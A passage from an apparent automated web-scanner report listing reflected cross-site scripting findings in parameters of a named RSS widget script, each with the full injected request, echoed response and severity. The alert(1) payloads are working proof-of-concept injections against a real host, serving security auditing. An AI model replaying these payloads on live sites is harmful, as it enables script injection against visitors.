<PARAM NAME="BGCOLOR" VALUE="#C6D0D2f6dc9';alert(1)//25f736e5d37">
...[SNIP]...

1.65. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_item_bgimage parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://feed.mikle.com
Path:   /feeds/rssmikle.cgi

Issue detail

The value of the rssmikle_item_bgimage request parameter is copied into the HTML document as plain text between tags. The payload 8aede<script>alert(1)</script>3fd943d3e7b was submitted in the rssmikle_item_bgimage parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeds/rssmikle.cgi?rssmikle_url=http%3A%2F%2Ffeeds.feedburner.com%2FOmvs-YahooNewsSearchResults&rssmikle_type=&rssmikle_frame_width=240&rssmikle_frame_height=230&rssmikle_frame_rico=&rssmikle_target=_blank&rssmikle_font_size=14&rssmikle_border=on&rssmikle_css_url=&rssmikle_title=off&rssmikle_title_bgcolor=%230066FF&rssmikle_title_color=%23FFFFFF&rssmikle_title_bgimage=http%3A%2F%2F&rssmikle_item_bgcolor=%23C6D0D2&rssmikle_item_bgimage=http%3A%2F%2F8aede<script>alert(1)</script>3fd943d3e7b&rssmikle_item_title_length=100&rssmikle_item_title_color=%23004382&rssmikle_item_border_bottom=on&rssmikle_item_description=on&rssmikle_item_description_length=100&rssmikle_item_description_color=%23666666&rssmikle_item_description_tag=off&rssmikle_item_podcast=icon HTTP/1.1
Host: feed.mikle.com
Proxy-Connection: keep-alive
Referer: http://www.omvssolar.com/investors.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=127943195.2017598590.1315103164.1315103164.1315103164.1; __utmz=127943195.1315103164.1.1.utmcsr=nationmultimedia.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/nt-widget/ann-feed.html

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 12:32:13 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13701

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
derline;}
#header .feed_title a:active{color:#FFFFFF;text-decoration:none;}
#content{margin:0px;padding:5px 0px 0px 0px;background-color:#C6D0D2;background-image:url(http://8aede<script>alert(1)</script>3fd943d3e7b);}
#content .feed_item{margin:0 0 7px 0;padding:0 0 7px 0;border-bottom:1px dashed #CCCCCC;}
#content .feed_item_title{margin:1px 0 1px 3px;padding:1px 2px 1px 3px;color:#0
...[SNIP]...

1.66. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_item_description_color parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://feed.mikle.com
Path:   /feeds/rssmikle.cgi

Issue detail

The value of the rssmikle_item_description_color request parameter is copied into the HTML document as plain text between tags. The payload 82f71<script>alert(1)</script>911cbac5acb was submitted in the rssmikle_item_description_color parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeds/rssmikle.cgi?rssmikle_url=http%3A%2F%2Ffeeds.feedburner.com%2FOmvs-YahooNewsSearchResults&rssmikle_type=&rssmikle_frame_width=240&rssmikle_frame_height=230&rssmikle_frame_rico=&rssmikle_target=_blank&rssmikle_font_size=14&rssmikle_border=on&rssmikle_css_url=&rssmikle_title=off&rssmikle_title_bgcolor=%230066FF&rssmikle_title_color=%23FFFFFF&rssmikle_title_bgimage=http%3A%2F%2F&rssmikle_item_bgcolor=%23C6D0D2&rssmikle_item_bgimage=http%3A%2F%2F&rssmikle_item_title_length=100&rssmikle_item_title_color=%23004382&rssmikle_item_border_bottom=on&rssmikle_item_description=on&rssmikle_item_description_length=100&rssmikle_item_description_color=%2366666682f71<script>alert(1)</script>911cbac5acb&rssmikle_item_description_tag=off&rssmikle_item_podcast=icon HTTP/1.1
Host: feed.mikle.com
Proxy-Connection: keep-alive
Referer: http://www.omvssolar.com/investors.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=127943195.2017598590.1315103164.1315103164.1315103164.1; __utmz=127943195.1315103164.1.1.utmcsr=nationmultimedia.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/nt-widget/ann-feed.html

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 12:32:14 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13660

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
82;text-decoration:none;}
#content .feed_item_podcast{margin:0 0 0 3px;padding:0 0 0 3px;}
#content .feed_item_description{margin:0 0 0 3px;padding:0 2px 0 3px;color:#66666682f71<script>alert(1)</script>911cbac5acb;line-height:135%;}
#footer{display:none;height:0px;margin:0px;padding:0px;color:#FFFFFF;background-color:#C6D0D2;background-image:url(http://);}
</style>
...[SNIP]...

1.67. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_item_podcast parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://feed.mikle.com
Path:   /feeds/rssmikle.cgi

Issue detail

The value of the rssmikle_item_podcast request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5cdc5'%3balert(1)//de6c201b5f2 was submitted in the rssmikle_item_podcast parameter. This input was echoed as 5cdc5';alert(1)//de6c201b5f2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /feeds/rssmikle.cgi?rssmikle_url=http%3A%2F%2Ffeeds.feedburner.com%2FOmvs-YahooNewsSearchResults&rssmikle_type=&rssmikle_frame_width=240&rssmikle_frame_height=230&rssmikle_frame_rico=&rssmikle_target=_blank&rssmikle_font_size=14&rssmikle_border=on&rssmikle_css_url=&rssmikle_title=off&rssmikle_title_bgcolor=%230066FF&rssmikle_title_color=%23FFFFFF&rssmikle_title_bgimage=http%3A%2F%2F&rssmikle_item_bgcolor=%23C6D0D2&rssmikle_item_bgimage=http%3A%2F%2F&rssmikle_item_title_length=100&rssmikle_item_title_color=%23004382&rssmikle_item_border_bottom=on&rssmikle_item_description=on&rssmikle_item_description_length=100&rssmikle_item_description_color=%23666666&rssmikle_item_description_tag=off&rssmikle_item_podcast=icon5cdc5'%3balert(1)//de6c201b5f2 HTTP/1.1
Host: feed.mikle.com
Proxy-Connection: keep-alive
Referer: http://www.omvssolar.com/investors.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=127943195.2017598590.1315103164.1315103164.1315103164.1; __utmz=127943195.1315103164.1.1.utmcsr=nationmultimedia.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/nt-widget/ann-feed.html

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 12:32:14 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13647

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
rseInt(str);
if(isNaN(num)){
return 0;
} else if(!num) {
return 0;
}
return num;
}

function init() {
var rssMikleType = '';
var anchorTarget = '_blank';
var itemPodcast = 'icon5cdc5';alert(1)//de6c201b5f2';

var containerObj = document.getElementById('container');
var headerObj = document.getElementById('header') ? document.getElementById('header') : "";
var contentObj = document.getElementById('
...[SNIP]...

1.68. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_item_title_color parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://feed.mikle.com
Path:   /feeds/rssmikle.cgi

Issue detail

The value of the rssmikle_item_title_color request parameter is copied into the HTML document as plain text between tags. The payload 66512<script>alert(1)</script>2af99c2604f was submitted in the rssmikle_item_title_color parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeds/rssmikle.cgi?rssmikle_url=http%3A%2F%2Ffeeds.feedburner.com%2FOmvs-YahooNewsSearchResults&rssmikle_type=&rssmikle_frame_width=240&rssmikle_frame_height=230&rssmikle_frame_rico=&rssmikle_target=_blank&rssmikle_font_size=14&rssmikle_border=on&rssmikle_css_url=&rssmikle_title=off&rssmikle_title_bgcolor=%230066FF&rssmikle_title_color=%23FFFFFF&rssmikle_title_bgimage=http%3A%2F%2F&rssmikle_item_bgcolor=%23C6D0D2&rssmikle_item_bgimage=http%3A%2F%2F&rssmikle_item_title_length=100&rssmikle_item_title_color=%2300438266512<script>alert(1)</script>2af99c2604f&rssmikle_item_border_bottom=on&rssmikle_item_description=on&rssmikle_item_description_length=100&rssmikle_item_description_color=%23666666&rssmikle_item_description_tag=off&rssmikle_item_podcast=icon HTTP/1.1
Host: feed.mikle.com
Proxy-Connection: keep-alive
Referer: http://www.omvssolar.com/investors.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=127943195.2017598590.1315103164.1315103164.1315103164.1; __utmz=127943195.1315103164.1.1.utmcsr=nationmultimedia.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/nt-widget/ann-feed.html

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 12:32:13 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13824

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
#content .feed_item{margin:0 0 7px 0;padding:0 0 7px 0;border-bottom:1px dashed #CCCCCC;}
#content .feed_item_title{margin:1px 0 1px 3px;padding:1px 2px 1px 3px;color:#00438266512<script>alert(1)</script>2af99c2604f;font-weight:bold;}
#content .feed_item_title a:link{color:#00438266512<script>
...[SNIP]...

1.69. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_target parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://feed.mikle.com
Path:   /feeds/rssmikle.cgi

Issue detail

The value of the rssmikle_target request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3e227'%3balert(1)//699ffd7f0a5 was submitted in the rssmikle_target parameter. This input was echoed as 3e227';alert(1)//699ffd7f0a5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /feeds/rssmikle.cgi?rssmikle_url=http%3A%2F%2Ffeeds.feedburner.com%2FOmvs-YahooNewsSearchResults&rssmikle_type=&rssmikle_frame_width=240&rssmikle_frame_height=230&rssmikle_frame_rico=&rssmikle_target=_blank3e227'%3balert(1)//699ffd7f0a5&rssmikle_font_size=14&rssmikle_border=on&rssmikle_css_url=&rssmikle_title=off&rssmikle_title_bgcolor=%230066FF&rssmikle_title_color=%23FFFFFF&rssmikle_title_bgimage=http%3A%2F%2F&rssmikle_item_bgcolor=%23C6D0D2&rssmikle_item_bgimage=http%3A%2F%2F&rssmikle_item_title_length=100&rssmikle_item_title_color=%23004382&rssmikle_item_border_bottom=on&rssmikle_item_description=on&rssmikle_item_description_length=100&rssmikle_item_description_color=%23666666&rssmikle_item_description_tag=off&rssmikle_item_podcast=icon HTTP/1.1
Host: feed.mikle.com
Proxy-Connection: keep-alive
Referer: http://www.omvssolar.com/investors.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=127943195.2017598590.1315103164.1315103164.1315103164.1; __utmz=127943195.1315103164.1.1.utmcsr=nationmultimedia.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/nt-widget/ann-feed.html

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 12:32:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13843

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
n strToInt(str) {
num = parseInt(str);
if(isNaN(num)){
return 0;
} else if(!num) {
return 0;
}
return num;
}

function init() {
var rssMikleType = '';
var anchorTarget = '_blank3e227';alert(1)//699ffd7f0a5';
var itemPodcast = 'icon';

var containerObj = document.getElementById('container');
var headerObj = document.getElementById('header') ? document.getElementById('header') : "";
var contentObj
...[SNIP]...

1.70. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_target parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://feed.mikle.com
Path:   /feeds/rssmikle.cgi

Issue detail

The value of the rssmikle_target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fec0"><script>alert(1)</script>00a39daf45e was submitted in the rssmikle_target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeds/rssmikle.cgi?rssmikle_url=http%3A%2F%2Ffeeds.feedburner.com%2FOmvs-YahooNewsSearchResults&rssmikle_type=&rssmikle_frame_width=240&rssmikle_frame_height=230&rssmikle_frame_rico=&rssmikle_target=_blank4fec0"><script>alert(1)</script>00a39daf45e&rssmikle_font_size=14&rssmikle_border=on&rssmikle_css_url=&rssmikle_title=off&rssmikle_title_bgcolor=%230066FF&rssmikle_title_color=%23FFFFFF&rssmikle_title_bgimage=http%3A%2F%2F&rssmikle_item_bgcolor=%23C6D0D2&rssmikle_item_bgimage=http%3A%2F%2F&rssmikle_item_title_length=100&rssmikle_item_title_color=%23004382&rssmikle_item_border_bottom=on&rssmikle_item_description=on&rssmikle_item_description_length=100&rssmikle_item_description_color=%23666666&rssmikle_item_description_tag=off&rssmikle_item_podcast=icon HTTP/1.1
Host: feed.mikle.com
Proxy-Connection: keep-alive
Referer: http://www.omvssolar.com/investors.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=127943195.2017598590.1315103164.1315103164.1315103164.1; __utmz=127943195.1315103164.1.1.utmcsr=nationmultimedia.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/nt-widget/ann-feed.html

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 12:32:09 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13963

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href="http://biz.yahoo.com/bw/110906/20110906005785.html?.v=1" target="_blank4fec0"><script>alert(1)</script>00a39daf45e">
...[SNIP]...

1.71. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_title_bgcolor parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://feed.mikle.com
Path:   /feeds/rssmikle.cgi

Issue detail

The value of the rssmikle_title_bgcolor request parameter is copied into the HTML document as plain text between tags. The payload e21c2<script>alert(1)</script>91be55c18e9 was submitted in the rssmikle_title_bgcolor parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeds/rssmikle.cgi?rssmikle_url=http%3A%2F%2Ffeeds.feedburner.com%2FOmvs-YahooNewsSearchResults&rssmikle_type=&rssmikle_frame_width=240&rssmikle_frame_height=230&rssmikle_frame_rico=&rssmikle_target=_blank&rssmikle_font_size=14&rssmikle_border=on&rssmikle_css_url=&rssmikle_title=off&rssmikle_title_bgcolor=%230066FFe21c2<script>alert(1)</script>91be55c18e9&rssmikle_title_color=%23FFFFFF&rssmikle_title_bgimage=http%3A%2F%2F&rssmikle_item_bgcolor=%23C6D0D2&rssmikle_item_bgimage=http%3A%2F%2F&rssmikle_item_title_length=100&rssmikle_item_title_color=%23004382&rssmikle_item_border_bottom=on&rssmikle_item_description=on&rssmikle_item_description_length=100&rssmikle_item_description_color=%23666666&rssmikle_item_description_tag=off&rssmikle_item_podcast=icon HTTP/1.1
Host: feed.mikle.com
Proxy-Connection: keep-alive
Referer: http://www.omvssolar.com/investors.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=127943195.2017598590.1315103164.1315103164.1315103164.1; __utmz=127943195.1315103164.1.1.utmcsr=nationmultimedia.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/nt-widget/ann-feed.html

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 12:32:11 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13660

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
ner{overflow:hidden;margin:0;padding:0;width:240px;height:230px;font-size:14px;border:1px solid #CCCCCC;}
#header{margin:0px;padding:5px 5px 5px 5px;color:#FFFFFF;background-color:#0066FFe21c2<script>alert(1)</script>91be55c18e9;background-image:url(http://);}
#header .feed_title{margin:0;padding:0;font-weight:bold;}
#header .feed_title a:link{color:#FFFFFF;text-decoration:none;}
#hea
...[SNIP]...

1.72. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_title_bgimage parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://feed.mikle.com
Path:   /feeds/rssmikle.cgi

Issue detail

The value of the rssmikle_title_bgimage request parameter is copied into the HTML document as plain text between tags. The payload 52655<script>alert(1)</script>74461a05d22 was submitted in the rssmikle_title_bgimage parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeds/rssmikle.cgi?rssmikle_url=http%3A%2F%2Ffeeds.feedburner.com%2FOmvs-YahooNewsSearchResults&rssmikle_type=&rssmikle_frame_width=240&rssmikle_frame_height=230&rssmikle_frame_rico=&rssmikle_target=_blank&rssmikle_font_size=14&rssmikle_border=on&rssmikle_css_url=&rssmikle_title=off&rssmikle_title_bgcolor=%230066FF&rssmikle_title_color=%23FFFFFF&rssmikle_title_bgimage=http%3A%2F%2F52655<script>alert(1)</script>74461a05d22&rssmikle_item_bgcolor=%23C6D0D2&rssmikle_item_bgimage=http%3A%2F%2F&rssmikle_item_title_length=100&rssmikle_item_title_color=%23004382&rssmikle_item_border_bottom=on&rssmikle_item_description=on&rssmikle_item_description_length=100&rssmikle_item_description_color=%23666666&rssmikle_item_description_tag=off&rssmikle_item_podcast=icon HTTP/1.1
Host: feed.mikle.com
Proxy-Connection: keep-alive
Referer: http://www.omvssolar.com/investors.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=127943195.2017598590.1315103164.1315103164.1315103164.1; __utmz=127943195.1315103164.1.1.utmcsr=nationmultimedia.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/nt-widget/ann-feed.html

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 12:32:11 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13660

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
padding:0;width:240px;height:230px;font-size:14px;border:1px solid #CCCCCC;}
#header{margin:0px;padding:5px 5px 5px 5px;color:#FFFFFF;background-color:#0066FF;background-image:url(http://52655<script>alert(1)</script>74461a05d22);}
#header .feed_title{margin:0;padding:0;font-weight:bold;}
#header .feed_title a:link{color:#FFFFFF;text-decoration:none;}
#header .feed_title a:visited{col
...[SNIP]...

1.73. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_title_color parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://feed.mikle.com
Path:   /feeds/rssmikle.cgi

Issue detail

The value of the rssmikle_title_color request parameter is copied into the HTML document as plain text between tags. The payload f76d5<script>alert(1)</script>a4e3224bec was submitted in the rssmikle_title_color parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeds/rssmikle.cgi?rssmikle_url=http%3A%2F%2Ffeeds.feedburner.com%2FOmvs-YahooNewsSearchResults&rssmikle_type=&rssmikle_frame_width=240&rssmikle_frame_height=230&rssmikle_frame_rico=&rssmikle_target=_blank&rssmikle_font_size=14&rssmikle_border=on&rssmikle_css_url=&rssmikle_title=off&rssmikle_title_bgcolor=%230066FF&rssmikle_title_color=%23FFFFFFf76d5<script>alert(1)</script>a4e3224bec&rssmikle_title_bgimage=http%3A%2F%2F&rssmikle_item_bgcolor=%23C6D0D2&rssmikle_item_bgimage=http%3A%2F%2F&rssmikle_item_title_length=100&rssmikle_item_title_color=%23004382&rssmikle_item_border_bottom=on&rssmikle_item_description=on&rssmikle_item_description_length=100&rssmikle_item_description_color=%23666666&rssmikle_item_description_tag=off&rssmikle_item_podcast=icon HTTP/1.1
Host: feed.mikle.com
Proxy-Connection: keep-alive
Referer: http://www.omvssolar.com/investors.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=127943195.2017598590.1315103164.1315103164.1315103164.1; __utmz=127943195.1315103164.1.1.utmcsr=nationmultimedia.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/nt-widget/ann-feed.html

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 12:32:11 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13859

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
0;}
#container{overflow:hidden;margin:0;padding:0;width:240px;height:230px;font-size:14px;border:1px solid #CCCCCC;}
#header{margin:0px;padding:5px 5px 5px 5px;color:#FFFFFFf76d5<script>alert(1)</script>a4e3224bec;background-color:#0066FF;background-image:url(http://);}
#header .feed_title{margin:0;padding:0;font-weight:bold;}
#header .feed_title a:link{color:#FFFFFFf76d5<script>
...[SNIP]...

1.74. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_type parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://feed.mikle.com
Path:   /feeds/rssmikle.cgi

Issue detail

The value of the rssmikle_type request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8347c'%3balert(1)//a640d3a46b8 was submitted in the rssmikle_type parameter. This input was echoed as 8347c';alert(1)//a640d3a46b8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /feeds/rssmikle.cgi?rssmikle_url=http%3A%2F%2Ffeeds.feedburner.com%2FOmvs-YahooNewsSearchResults&rssmikle_type=8347c'%3balert(1)//a640d3a46b8&rssmikle_frame_width=240&rssmikle_frame_height=230&rssmikle_frame_rico=&rssmikle_target=_blank&rssmikle_font_size=14&rssmikle_border=on&rssmikle_css_url=&rssmikle_title=off&rssmikle_title_bgcolor=%230066FF&rssmikle_title_color=%23FFFFFF&rssmikle_title_bgimage=http%3A%2F%2F&rssmikle_item_bgcolor=%23C6D0D2&rssmikle_item_bgimage=http%3A%2F%2F&rssmikle_item_title_length=100&rssmikle_item_title_color=%23004382&rssmikle_item_border_bottom=on&rssmikle_item_description=on&rssmikle_item_description_length=100&rssmikle_item_description_color=%23666666&rssmikle_item_description_tag=off&rssmikle_item_podcast=icon HTTP/1.1
Host: feed.mikle.com
Proxy-Connection: keep-alive
Referer: http://www.omvssolar.com/investors.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=127943195.2017598590.1315103164.1315103164.1315103164.1; __utmz=127943195.1315103164.1.1.utmcsr=nationmultimedia.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/nt-widget/ann-feed.html

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 12:32:08 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13647

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
';
}
return tag;
}

function strToInt(str) {
num = parseInt(str);
if(isNaN(num)){
return 0;
} else if(!num) {
return 0;
}
return num;
}

function init() {
var rssMikleType = '8347c';alert(1)//a640d3a46b8';
var anchorTarget = '_blank';
var itemPodcast = 'icon';

var containerObj = document.getElementById('container');
var headerObj = document.getElementById('header') ? document.getElementById('
...[SNIP]...

1.75. http://fonts.smartmoney.com/k/fnb4igi-e.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
